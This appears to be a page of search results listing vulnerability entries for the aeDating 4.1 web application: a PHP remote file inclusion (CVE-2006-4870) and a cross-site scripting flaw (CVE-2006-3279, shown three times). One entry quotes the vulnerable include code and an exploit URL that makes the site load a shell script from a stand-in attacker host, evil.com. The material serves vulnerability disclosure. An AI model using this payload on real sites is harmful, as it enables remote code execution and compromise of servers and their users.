5 matches found
CVE-2006-4870
CVE-2006-4870 describes multiple PHP remote file inclusion vulnerabilities in AEDating 4.1 (and possibly earlier). A remote attacker can execute arbitrary PHP code by supplying a URL in the dir[inc] parameter targeting inc/design.inc.php or inc/admin_design.inc.php. The vulnerability’s impact is ...
aeDating 4.1 - dir[inc] Remote File Inclusion
AEDating all versions Remote File inclusion. Vulnerable code: /inc/design.inc.php, /inc/admin_design.inc.php: require_once "$dir[inc]db.inc.php"; require_once "$dir[inc]prof.inc.php"; Exploit: http://site.com/scriptpath/inc/design.inc.php?dir[inc]=http://evil.com/shell.txt?...
CVE-2006-3279
Cross-site scripting (XSS) vulnerability in aeDating 4.1 allows remote attackers to inject arbitrary web script or HTML via the (1) Sex parameter in index.php, (2) ProfileType parameter in join_form.php, and (3) Email parameter in forgot.php...
CVE-2006-3279
Cross-site scripting (XSS) vulnerability in aeDating 4.1 allows remote attackers to inject arbitrary web script or HTML via the (1) Sex parameter in index.php, (2) ProfileType parameter in join_form.php, and (3) Email parameter in forgot.php...
CVE-2006-3279
CVE-2006-3279 describes a cross-site scripting (XSS) vulnerability in aeDating 4.1. The affected application exposes three vulnerable input points: the Sex parameter in index.php, the ProfileType parameter in join_form.php, and the Email parameter in forgot.php. These allow remote attackers to in...